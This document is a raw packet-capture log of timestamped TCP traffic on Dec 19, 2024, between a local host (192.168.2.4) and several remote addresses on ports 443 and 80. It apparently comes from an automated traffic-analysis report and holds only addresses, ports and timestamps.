                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.223859072 CET44349789104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.223913908 CET49789443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.223927975 CET44349789104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.224025011 CET44349789104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.224069118 CET49789443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.224684000 CET49802443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.224695921 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.225198984 CET49789443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.225214958 CET44349789104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.225999117 CET49788443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.226010084 CET44349788104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.228246927 CET49803443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.228272915 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.228328943 CET49803443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.228492022 CET49803443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.228507996 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.305457115 CET44349796104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.305583954 CET44349796104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.305674076 CET44349796104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.305735111 CET49796443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.305769920 CET44349796104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.305818081 CET49796443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.305828094 CET44349796104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.313378096 CET44349796104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.313477039 CET49796443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.313492060 CET44349796104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.321779966 CET44349796104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.321852922 CET49796443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.326661110 CET49796443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.326688051 CET44349796104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.449481964 CET44349797104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.449667931 CET44349797104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.449728012 CET49797443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.450262070 CET49797443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.450275898 CET44349797104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.453505993 CET49806443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.453588963 CET44349806104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.453676939 CET49806443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.453849077 CET49806443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.453886032 CET44349806104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.681440115 CET49807443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.681528091 CET4434980713.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.681715012 CET49807443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.681884050 CET49807443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.681919098 CET4434980713.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.208615065 CET44349799104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.208950996 CET49799443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.208962917 CET44349799104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.209237099 CET44349799104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.209520102 CET49799443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.209563017 CET44349799104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.209650993 CET49799443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.255328894 CET44349799104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.452594042 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.452923059 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.452953100 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.453424931 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.453854084 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.453948021 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.453983068 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.498143911 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.498172045 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.510077000 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.510198116 CET44349801104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.510358095 CET49802443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.510385990 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.510477066 CET49801443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.510494947 CET44349801104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.511090040 CET44349801104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.511600018 CET49801443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.511709929 CET44349801104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.511727095 CET49801443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.511873007 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.511961937 CET49802443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.512340069 CET49802443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.512432098 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.512453079 CET49802443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.513200998 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.513562918 CET49803443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.513583899 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.515029907 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.515090942 CET49803443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.515463114 CET49803443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.515578985 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.515595913 CET49803443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.555340052 CET44349801104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.555357933 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.560378075 CET49801443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.560378075 CET49803443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.560395956 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.560429096 CET49802443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.560451031 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.608023882 CET49803443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.608025074 CET49802443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.679086924 CET44349799104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.679179907 CET44349799104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.679231882 CET49799443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.681009054 CET49799443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.681020021 CET44349799104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.699805021 CET44349806104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.700099945 CET49806443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.700135946 CET44349806104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.700613976 CET44349806104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.700916052 CET49806443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.700997114 CET44349806104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.701081038 CET49806443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.701114893 CET44349806104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.818768978 CET49808443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.818860054 CET4434980835.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.818948030 CET49808443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.819228888 CET49808443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.819273949 CET4434980835.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.918555975 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.918677092 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.918724060 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.918747902 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.918893099 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.918936968 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.918937922 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.918963909 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.919015884 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.927014112 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.935420990 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.935477018 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.935501099 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.970979929 CET49809443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.971029997 CET44349809104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.971115112 CET49809443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.971553087 CET49809443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.971570015 CET44349809104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.977365971 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.977636099 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.977694035 CET49803443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.977725983 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.977832079 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.977880955 CET49803443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.977890015 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.978228092 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.978307962 CET49803443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.978317022 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.981316090 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.981333971 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.986332893 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.986403942 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.986545086 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.986548901 CET49802443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.986568928 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.986624002 CET49802443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.986753941 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.993657112 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.993707895 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.993707895 CET49803443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.993720055 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.993771076 CET49803443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.994579077 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.994625092 CET49802443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.994645119 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.001914024 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.004983902 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.005043983 CET49802443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.005062103 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.013351917 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.013401985 CET49802443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.013420105 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.027324915 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.038178921 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.043040991 CET49803443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.066425085 CET44349801104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.066699982 CET44349801104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.066740990 CET44349801104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.066790104 CET44349801104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.066831112 CET44349801104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.066868067 CET49801443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.066868067 CET49801443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.066884041 CET44349801104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.066927910 CET49801443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.067433119 CET44349801104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.067518950 CET49802443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.067572117 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.082843065 CET44349801104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.082918882 CET49801443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.082925081 CET44349801104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.083209038 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.083239079 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.091331959 CET44349801104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.091391087 CET49801443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.091397047 CET44349801104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.096731901 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.113862038 CET49802443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.113892078 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.114147902 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.114203930 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.114217043 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.123392105 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.123457909 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.123467922 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.123511076 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.123557091 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.131273985 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.139058113 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.139122009 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.139149904 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.144352913 CET49801443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.144352913 CET49803443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.146887064 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.146966934 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.146996021 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.151509047 CET4972380192.168.2.423.32.238.18
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.154719114 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.154795885 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.154825926 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.159554958 CET49802443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.163178921 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.163234949 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.163248062 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.164618969 CET44349806104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.164789915 CET44349806104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.164860010 CET49806443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.165222883 CET49806443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.165271044 CET44349806104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.165297985 CET49806443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.165330887 CET49806443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.168848991 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.170317888 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.170380116 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.170387983 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.174087048 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.174141884 CET49803443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.174154043 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.178154945 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.178217888 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.178225040 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.178535938 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.181967974 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.182024002 CET49803443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.182033062 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.182255983 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.182301998 CET49802443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.182308912 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.185863018 CET44349801104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.189812899 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.189866066 CET49803443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.189874887 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.190074921 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.190119982 CET49802443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.190128088 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.191966057 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.192034006 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.192040920 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.197614908 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.197674036 CET49803443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.197683096 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.197961092 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.198014021 CET49802443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.198021889 CET44349802104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.198940039 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.198997021 CET49800443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.199003935 CET44349800104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.208014965 CET4434980713.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.208239079 CET49807443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.208307981 CET4434980713.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.210136890 CET4434980713.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.210211039 CET49807443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.211169004 CET49807443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.211266041 CET4434980713.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.211303949 CET49807443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.213108063 CET44349803104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.213181019 CET44349803104.16.102.112192.168.2.4
